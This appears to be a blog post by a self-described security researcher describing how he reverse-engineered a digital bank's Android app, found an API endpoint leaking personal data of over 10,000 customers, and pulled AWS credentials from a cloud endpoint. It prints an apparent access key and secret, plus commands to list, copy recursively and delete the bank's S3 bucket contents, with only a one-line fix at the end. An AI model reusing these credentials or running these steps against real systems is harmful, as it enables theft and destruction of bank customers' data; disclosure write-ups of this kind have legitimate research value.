ANDROID APPLICATION EXPLOITATION OF A DIGITAL BANK

All too often, when security researchers or hackers find personal information online, it’s sitting in an unsecured Amazon S3 bucket. We see this time and time again, often with extremely troubling results.

Hundreds of millions of user records left sitting in plain sight. Nearly eight hundred thousand applications for birth certificate copies ripe for the taking. Tens of thousands of bank app users’ private info just practically begging to be stolen. Incidents like these — and there are many, many more — are all tied together by one cloud computing platform: Amazon Web Services.

So what’s going on here? Are customers simply misusing the product, or is there some sort of design flaw that makes the accidental exposure of data inevitable?

This is why I am willing to share my favorite hack and also trying to explain the sometimes confusing world of configured buckets, security experts are more than happy to share their expertise.

Android and IOS Mind Map by Hackerscrolls

POORLY WRITTEN API endpoint

I downloaded the mobile app to my android device, pulled the apk to my virtual machine and did a reverse engineering on the apk file patched the app, and then recompiled it before install the patched apk on my android emulator using various tools and attack methods listed below.

Zip sudo apt install zip unzip

Apktool https://ibotpeaches.github.io/Apktool...

Dex2Jar https://github.com/pxb1988/dex2jar

SQLite3 sudo apt-get install sqlite3 sudo apt-get install sqlitebrowser

Adb sudo apt-get install adb Pip/Python apt install python3-pip

JaDx-GUI https://github.com/skylot/jadx

MobSF https://github.com/MobSF/Mobile-Secur...

Frida https://github.com/frida/frida

I did a series on android security on my YouTube channel here https://www.youtube.com/c/StephenOgu

EXPLOIT AT THE API LEVEL

I discovered an endpoint the i could exploit and extract all the users from the database. this exploit reviewed a records of more than 10k users PII with other sensitive information.

POST Host: api.bankapi.io/prod/proximitylist

Full name

email

username////

account number

customerId

profileimage

mobile number

last seen

last seen

profile status

Called the Bank explained in details the exposure of this credentials in the public

HACKING THE BANK S3 BUCKETS

https://1x37yl78nj.execute-api.us-east-1.amazonaws.com/dev/aWSCredential

Key “BKIAQCMYLE2YI6W4TII6”

Secret “sb91OSkhihVjO9bmBwbljsBu+GH5AmPgYxnRuYG2”

Responsecode “00”

Responsemessage “Success”

CLI into AWS S3 Bucket of the Target

https://github.com/awslabs/aws-shell

aws configure

aws s3 ls

aws s3 cp s3://s3Bucket-Name /home/kali/Desktop/folderName — recursive

aws s3 rm s3://s3Bucket-Name /home/kali/Desktop/folderName — recursive

https://digi.ninja/projects/bucket_finder.php

AWS exploit

https://www.youtube.com/watch?v=3A9rNxwMix0&t=2s

SOLUTIONS

Reconfigure the instance metadata service from v1 to v2

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html#configuring-IMDS-existing-instances

Instance Metadata Service Version 1 (IMDSv1) — a request/response method

reconfigure to Instance Metadata Service Version 2 (IMDSv2) — a session-oriented method

THANKS

RESOURCES

https://www.youtube.com/c/StephenOgu

https://www.youtube.com/c/B3nacSec

App Security Researcher, #YouTube https://youtube.com/stephenogu #Liverpoolfan

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store